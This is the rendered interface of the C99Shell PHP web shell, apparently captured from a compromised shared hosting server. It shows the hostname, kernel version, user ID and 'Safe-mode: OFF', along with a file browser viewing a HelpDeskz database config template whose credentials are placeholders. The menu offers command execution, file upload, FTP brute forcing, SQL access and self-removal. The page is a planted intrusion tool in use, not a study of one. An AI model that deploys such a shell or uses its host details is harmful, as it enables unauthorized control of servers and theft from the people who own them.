!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/helpdeskz/   drwxr-xr-x
Free 293.49 GB of 429.69 GB (68.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Helpdesk.php (1009 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package EvolutionScript
 * @author: EvolutionScript S.A.C.
 * @Copyright (c) 2010 - 2020, EvolutionScript.com
 * @link http://www.evolutionscript.com
 */

namespace Config;


use 
CodeIgniter\Config\BaseConfig;

class 
Helpdesk extends BaseConfig
{
    
#Database host
    
const DB_HOST '[[softdbhost]]';

    
#Database username
    
const DB_USER '[[softdbuser]]';

    
#Database password
    
const DB_PASSWORD '[[softdbpass]]';

    
#Database name
    
const DB_NAME '[[softdb]]';

    
#Database table prefix
    
const DB_PREFIX '[[dbprefix]]';

    
#Database port, do not change it if you are not sure
    
const DB_PORT 3306;

    
#URL of your helpdesk
    
const SITE_URL '[[softurl]]';

    
#Upload path for images used in HTML editor and logo
    
const UPLOAD_PATH FCPATH.'upload';

    
#Default helpdesk language
    
const DEFAULT_LANG 'en';

    
#URI name to access to staff panel. Ex: staff / then you can access in http://helpdesk.com/staff
    
const STAFF_URI 'staff';
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0917 ]--